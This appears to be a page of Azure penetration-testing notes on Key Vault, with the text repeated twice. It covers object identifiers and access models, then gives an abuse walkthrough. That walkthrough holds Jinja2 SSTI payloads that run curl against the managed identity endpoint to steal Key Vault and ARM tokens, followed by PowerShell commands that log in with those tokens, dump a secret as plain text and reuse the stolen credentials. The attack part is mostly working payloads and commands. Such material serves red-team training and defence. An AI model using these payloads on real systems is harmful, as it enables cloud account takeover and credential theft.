Key Vault

PreviousVirtual Machines NextARM Deployment History

Last updated 3 months ago

Key Vault

Key vault is Azure's service for storing secrets such as passwords, connection strings, certificates, private keys etc. With the right permissions and access, Azure resources that support managed identities (VM's App service, Functions, containers). can securely retrieve secrets from the key vault.

Identifier

Objects in a key vault are identified using a Object identifier URL. The base URL is of the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault-name is globally unique. And the object-type can be "keys", "secrets" or "certificates".

Access to key vaults

Key Vaults support RBAC and access policies. So for role assignments, a application can have the "Key Vault Secrets User" or "Key Vault Administrator".

Do not use access policies for key vaults from a defense perspective! This is because access policies can be edited by other roles other than the owner of the key vault, such as contributor.

If we can compromise an azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to more resources. Note that each secret has its own IAM inherited from the key vault.

Roles who can access secrets

Abuse example

We have a App Service that is vulnerable to Jinja2 SSTI. We get a access token from vault.azure.net:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Also, we will need to get a access_token for ARM:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We connect with Az Cli using both tokens:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token

Next, check if we have at least a reader role on a key vault:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can read Secrets:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, extract secret as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!

Use it to connect to Az Cli:

$passwd = ConvertTo-SecureString "Password123" -AsPlainText -Force
$creds =  New-Object System.management.automation.pscredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount  -Credential $creds

PreviousVirtual Machines NextARM Deployment History

Last updated 3 months ago

Identifier

Objects in a key vault are identified using a Object identifier URL. The base URL is of the format:

https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}

The vault-name is globally unique. And the object-type can be "keys", "secrets" or "certificates".

Access to key vaults

Key Vaults support RBAC and access policies. So for role assignments, a application can have the "Key Vault Secrets User" or "Key Vault Administrator".

Do not use access policies for key vaults from a defense perspective! This is because access policies can be edited by other roles other than the owner of the key vault, such as contributor.

Roles who can access secrets

Abuse example

We have a App Service that is vulnerable to Jinja2 SSTI. We get a access token from vault.azure.net:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Also, we will need to get a access_token for ARM:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

We connect with Az Cli using both tokens:

Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultToken $token

Next, check if we have at least a reader role on a key vault:

Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral

Check if we can read Secrets:

Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :

Finally, extract secret as plain text:

Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!

Use it to connect to Az Cli:

$passwd = ConvertTo-SecureString "Password123" -AsPlainText -Force
$creds =  New-Object System.management.automation.pscredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount  -Credential $creds